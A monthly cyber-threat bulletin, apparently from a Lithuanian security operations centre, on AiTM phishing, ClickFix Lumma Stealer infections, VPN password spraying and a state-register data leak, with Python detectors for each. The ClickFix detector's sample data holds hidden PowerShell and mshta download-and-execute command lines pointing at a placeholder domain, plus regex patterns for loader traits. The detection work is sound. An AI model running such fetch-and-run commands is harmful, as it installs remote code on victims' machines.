SOCshare May 2026: News in cyber threat landscape

May 2026 was clearly dominated by identity and credential theft. Phishing campaigns were, as is most often the case, aimed at Microsoft 365 and other email accounts, while the most advanced ones bypass two-factor authentication in real time (AiTM). Six out of ten events we logged in May were tied specifically to credential harvesting or session hijacking. That same month, Lithuania was shaken by a large-scale leak from state registers, which likewise appears to have been carried out using legitimate login credentials seized by threat actors. This best illustrates the month’s key message: today attackers do not “break down the door”; they log in with someone else’s keys.

Phishing and AiTM: MFA alone is no longer enough 

Most of May’s events were phishing emails leading to credential-harvesting pages, most often imitating the Microsoft 365 sign-in. Several campaigns used the AiTM (adversary-in-the-middle) technique: once the victim signs in, the attacker proxies the communication in real time and steals the session token, thereby bypassing even enabled MFA. 

We also observed impersonation of company brands: we recorded attempts to impersonate an internet service provider in order to deliver fake invoices and defraud victims, as well as an imitation of a bank’s login page hosted on a compromised foreign domain and targeting Lithuanian users. Attackers increasingly hide behind legitimate cloud services (e.g., Cloudflare Workers) and redirect chains, which makes such emails harder to filter. The trend is not local: over the past year AiTM attacks have grown by roughly 146% worldwide, and in March Europol took down the major phishing-as-a-service platform Tycoon 2FA. The conclusion is simple – MFA is essential, but it is not enough: phishing-resistant MFA must be deployed, and session token usage anomalies that may indicate token theft must be monitored.
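The session-token monitoring recommended above can be expressed as a simple rule over sign-in telemetry: a session identifier that was issued to one network and client and then shows up, within the same day, from a different ASN or user agent has most likely been replayed by a proxy. The following is an added example written for this review, not code from the original post; the sign-in records are constructed, and the field names (`session`, `asn`, `ua`) are an assumption standing in for whatever your identity provider's sign-in log actually exposes.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sign-in events for illustration (not real telemetry). Field names are an
# assumption; cloud identity logs expose equivalents (session id, source IP, ASN, user agent).
SIGNINS = [
    {"ts": "2026-05-12T08:01:10", "user": "jonas@example.lt", "session": "S-1",
     "ip": "84.15.1.10", "asn": "AS-LT-TELCO", "ua": "Edge/124 Windows"},
    {"ts": "2026-05-12T08:03:42", "user": "jonas@example.lt", "session": "S-1",
     "ip": "84.15.1.10", "asn": "AS-LT-TELCO", "ua": "Edge/124 Windows"},
    # The same session id reappears minutes later from a hosting ASN with a different client:
    # the token was captured by a proxy and replayed, which is what AiTM looks like in the logs.
    {"ts": "2026-05-12T08:08:05", "user": "jonas@example.lt", "session": "S-1",
     "ip": "185.220.0.7", "asn": "AS-HOSTING-X", "ua": "Chrome/123 Linux"},
    {"ts": "2026-05-12T09:15:00", "user": "ruta@example.lt", "session": "S-2",
     "ip": "84.15.2.20", "asn": "AS-LT-TELCO", "ua": "Edge/124 Windows"},
    # Legitimate roaming: moving to a mobile network produced a new session, not a reused one.
    {"ts": "2026-05-12T12:40:00", "user": "ruta@example.lt", "session": "S-3",
     "ip": "213.190.0.9", "asn": "AS-LT-MOBILE", "ua": "Edge/124 Windows"},
]


def find_session_anomalies(events, window=timedelta(hours=24)):
    """Flag a session id whose later use differs from its first use in ASN or user agent.

    Only events within `window` of the session's first sighting are compared, so a session
    that is long-lived by design does not get flagged on every refresh."""
    by_session = defaultdict(list)
    for e in events:
        by_session[e["session"]].append(e)

    findings = []
    for sid, evs in by_session.items():
        evs.sort(key=lambda e: e["ts"])  # ISO-8601 strings sort chronologically
        first = evs[0]
        t0 = datetime.fromisoformat(first["ts"])
        for e in evs[1:]:
            delta = datetime.fromisoformat(e["ts"]) - t0
            if delta > window:
                break
            reasons = []
            if e["asn"] != first["asn"]:
                reasons.append("asn")
            if e["ua"] != first["ua"]:
                reasons.append("user_agent")
            if reasons:
                findings.append({
                    "user": e["user"], "session": sid, "reasons": reasons,
                    "first_seen": first["ip"], "then_seen": e["ip"],
                    "minutes_apart": delta.total_seconds() / 60,
                })
    return findings


if __name__ == "__main__":
    for finding in find_session_anomalies(SIGNINS):
        print(finding)
```

A new session from a new network (S-2 followed by S-3) is deliberately not flagged here; that is ordinary roaming and belongs to a separate, lower-severity "unusual login" rule. The strong signal is one session identifier in two places.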

ClickFix – “Lumma Stealer” 

ClickFix attacks, which dominated in previous months, remained active in May. The victim is shown a fake CAPTCHA or “error” page urging them to “verify” or “fix” access by pasting a command into the Windows Run dialog. This launches a PowerShell command that loads the Lumma Stealer infostealer directly into memory, leaving no files on disk. In May we recorded two such ClickFix Lumma cases. Because the malicious code runs in memory, signature-based defenses struggle to detect it – behavioral analysis is essential. 
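The behavioral detection the paragraph calls for comes down to two observations that signature engines miss: a pasted Run-dialog command produces a script interpreter whose parent is explorer.exe, and the command line carries the traits of an in-memory loader (hidden window, policy bypass, a download-and-evaluate cradle). The scorer below is an added example written for this review and is not code from the original post; the process-creation events are constructed in a simplified Sysmon-style shape, and the "malicious" command lines point at a reserved `.invalid` domain.

```python
import re

# Constructed process-creation events, shaped like simplified Sysmon Event ID 1 records.
# The loader-like command lines are illustrative and use the reserved .invalid domain.
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (iwr \'http://example.invalid/verify\')"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://example.invalid/fix.hta"},
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -File build.ps1"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Service"},
]

# Interpreters and living-off-the-land binaries a victim would be told to type into Run.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line traits of in-memory loaders; each match adds one point to the score.
TRAITS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)\b", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "web_download": re.compile(r"\biwr\b|invoke-webrequest|downloadstring|net\.webclient", re.I),
    "mshta_remote": re.compile(r"\bmshta\s+https?://", re.I),
}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons). An interpreter spawned directly by explorer.exe is worth two
    points because that is exactly what a pasted Run-dialog command produces; each loader
    trait found in the command line adds one more."""
    score, reasons = 0, []
    if basename(event["parent"]) == "explorer.exe" and basename(event["image"]) in INTERPRETERS:
        score += 2
        reasons.append("interpreter_from_explorer")
    for name, pattern in TRAITS.items():
        if pattern.search(event["cmdline"]):
            score += 1
            reasons.append(name)
    return score, reasons


def detect_clickfix(events, threshold=3):
    """Events scoring at or above `threshold` are returned as candidate ClickFix executions."""
    hits = []
    for e in events:
        score, reasons = score_event(e)
        if score >= threshold:
            hits.append({"image": basename(e["image"]), "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect_clickfix(EVENTS):
        print(hit)
```

The threshold of three means a developer's plain `powershell -File build.ps1` from an editor scores nothing, while an interpreter launched from the shell scores only two on its own and needs at least one loader trait before it alerts. On Windows the Run dialog also records what was typed under the user's `RunMRU` registry key, which gives forensics a second, independent place to confirm a hit.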

Targeted attacks against Lithuanian targets 

Alongside mass phishing, we also saw targeted intrusion attempts. We recorded SSL/VPN login attempts using a list of Lithuanian usernames, which indicates that the attackers had gathered information about a specific organization in advance. We also observed automated scanning of publicly accessible systems and attempts to exploit vulnerabilities (e.g., SSRF), as well as malware distribution through forged installers and CDNs (e.g., a trojanized JDownloader, the DriverHub PUA). Different methods, but the common denominator is the same – initial access through a human or through an unprotected public-facing service. 
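The VPN login attempts described above, a prepared list of usernames tried from one source, are the classic password-spraying shape and are easy to pick out of gateway logs: many distinct accounts failing from the same address inside a short window, as opposed to one user fumbling a password a few times. The detector below is an added example written for this review, not code from the original post; the SSL VPN log lines and their `user=`/`src=`/`result=` format are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed SSL VPN authentication log lines (syslog-like; the format is assumed for the example).
LOG = """\
2026-05-20T02:14:01 vpn-gw sslvpn: user=jonas.p src=203.0.113.9 result=failure
2026-05-20T02:14:09 vpn-gw sslvpn: user=ruta.k src=203.0.113.9 result=failure
2026-05-20T02:14:17 vpn-gw sslvpn: user=tomas.b src=203.0.113.9 result=failure
2026-05-20T02:14:25 vpn-gw sslvpn: user=egle.m src=203.0.113.9 result=failure
2026-05-20T02:14:33 vpn-gw sslvpn: user=mantas.v src=203.0.113.9 result=failure
2026-05-20T02:14:41 vpn-gw sslvpn: user=greta.s src=203.0.113.9 result=failure
2026-05-20T07:58:10 vpn-gw sslvpn: user=jonas.p src=84.15.3.3 result=failure
2026-05-20T07:58:30 vpn-gw sslvpn: user=jonas.p src=84.15.3.3 result=success
""".splitlines()

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ sslvpn: user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>\w+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def detect_spray(lines, min_users=5, window=timedelta(minutes=10)):
    """Per source address, find the sliding window of failed logins covering the most
    distinct usernames; report the source when that count reaches `min_users`."""
    failures = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["result"] == "failure":
            failures[rec["src"]].append(rec)

    findings = {}
    for src, recs in failures.items():
        recs.sort(key=lambda r: r["ts"])
        best, lo = None, 0
        for hi in range(len(recs)):
            while recs[hi]["ts"] - recs[lo]["ts"] > window:
                lo += 1  # slide the window start forward until it fits
            users = {r["user"] for r in recs[lo:hi + 1]}
            if len(users) >= min_users and (best is None or len(users) > len(best["users"])):
                best = {"users": sorted(users),
                        "from": recs[lo]["ts"].isoformat(),
                        "to": recs[hi]["ts"].isoformat()}
        if best:
            findings[src] = best
    return findings


if __name__ == "__main__":
    for src, info in detect_spray(LOG).items():
        print(src, len(info["users"]), "accounts between", info["from"], "and", info["to"])
```

The single user at 84.15.3.3 who fails once and then succeeds is never reported, because the rule counts distinct accounts rather than attempts. The list of usernames a flagged source tried is worth keeping: it tells you which accounts the attacker already knew about and therefore which ones to check for a successful login later.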

What else happened in May 2026?

The Centre of Registers case
Lithuania disclosed one of its largest recent incidents: more than 600,000 records were illegitimately downloaded from state registers. It has been publicly stated that the attackers used stolen legitimate credentials and ran queries from abroad over several months. President G. Nausėda linked the incident to “hostile states.”
2025 National Cybersecurity Status report
The number of breaches of legal entities’ systems almost doubled (from 155 to 280). For 2026 it is projected that artificial intelligence will make attacks faster and more convincing, while the supply chain will remain one of the main systemic weaknesses.

Key takeaways

Stolen legitimate credentials remain one of the principal intrusion vectors. MFA is essential, yet AiTM bypasses it, so phishing-resistant MFA, monitoring of session-token reuse, and detection of unusual logins are all needed. 

Phishing emails increasingly arrive from legitimate but compromised mailboxes or trusted domains and hide behind cloud services that traditional email filters do not flag. ClickFix and infostealer-type malware run in memory, fileless, so signature-based defenses do not catch them – behavioral and contextual analysis, together with continuous user training, are required. 

Looking ahead 

Organizations should focus on: 

  • deploying phishing-resistant MFA and monitoring session tokens and login anomalies; 
  • limiting and auditing the query volumes of legitimate accounts; 
  • strengthening detection capabilities for ClickFix-type attacks (behavioral analysis) and training employees to recognize brand impersonation. 
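The second bullet, limiting and auditing the query volumes of legitimate accounts, is the control that would have surfaced the register case described above: valid credentials running queries from abroad for months leave a volume and geography footprint even when every individual login succeeds. The audit below is an added example written for this review, not code from the original post or from any register operator; the per-account daily counts and countries are constructed, and the baseline rule (flag a day above three times the account's own median, or from outside its home country) is one reasonable choice, not a published standard.

```python
from collections import defaultdict
from statistics import median

# Constructed daily query counts per service account against a register-style database
# (illustrative; not data from the incident). Each row: (account, day, queries, country).
DAILY_USAGE = [
    ("svc-notary-07", "2026-05-01", 41, "LT"),
    ("svc-notary-07", "2026-05-02", 38, "LT"),
    ("svc-notary-07", "2026-05-03", 45, "LT"),
    ("svc-notary-07", "2026-05-04", 40, "LT"),
    ("svc-notary-07", "2026-05-05", 43, "LT"),
    # Same credentials, now driven by a script from abroad: volume and geography both break the pattern.
    ("svc-notary-07", "2026-05-06", 2200, "XX"),
    ("svc-bank-12", "2026-05-01", 300, "LT"),
    ("svc-bank-12", "2026-05-02", 310, "LT"),
    ("svc-bank-12", "2026-05-03", 295, "LT"),
    ("svc-bank-12", "2026-05-04", 330, "LT"),  # within normal day-to-day variance
]


def suggested_daily_cap(history, ratio=3.0):
    """A per-account hard limit derived from the account's own median usage; the same
    number the audit uses as its alert threshold, so limiting and auditing agree."""
    return int(ratio * median(history)) if history else None


def audit_query_volumes(rows, home_countries=("LT",), min_history=3, ratio=3.0):
    """Flag a day whose count exceeds `ratio` times the account's median over prior days
    (once at least `min_history` days are known), or whose source country is not a home country.
    Days flagged for volume are kept out of the baseline so a compromise cannot raise its own cap."""
    by_account = defaultdict(list)
    for account, day, queries, country in rows:
        by_account[account].append((day, queries, country))

    findings = []
    for account, days in by_account.items():
        days.sort()  # ISO dates sort chronologically
        history = []
        for day, queries, country in days:
            reasons = []
            cap = suggested_daily_cap(history, ratio) if len(history) >= min_history else None
            if cap is not None and queries > cap:
                reasons.append("volume")
            if country not in home_countries:
                reasons.append("geo")
            if reasons:
                findings.append({"account": account, "day": day, "queries": queries,
                                 "baseline": median(history) if history else None,
                                 "cap": cap, "reasons": reasons})
            if "volume" not in reasons:
                history.append(queries)
    return findings


if __name__ == "__main__":
    for finding in audit_query_volumes(DAILY_USAGE):
        print(finding)
```

Because the cap is computed from each account's own history, a high-volume integration such as `svc-bank-12` is not penalised for being busy, while a low-volume account that suddenly runs thousands of lookups is caught on the first anomalous day. In production the cap is what the application enforces at query time; the audit is what tells you the cap was hit and from where.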

Sources 

https://www.nksc.lt/naujienos/nacionaline_kibernetinio_saugumo_bukles_ataskaita_.html 

https://www.elastic.co/security-labs/tycoon-2fa-aitm-detection-engineering 

https://www.microsoft.com/en-us/security/blog/2026/05/04/breaking-the-code-multi-stage-code-of-conduct-phishing-campaign-leads-to-aitm-token-compromise/ 

https://thehackernews.com/2026/05/microsoft-details-phishing-campaign.html 

https://www.microsoft.com/en-us/security/blog/2026/04/30/email-threat-landscape-q1-2026-trends-and-insights/ 
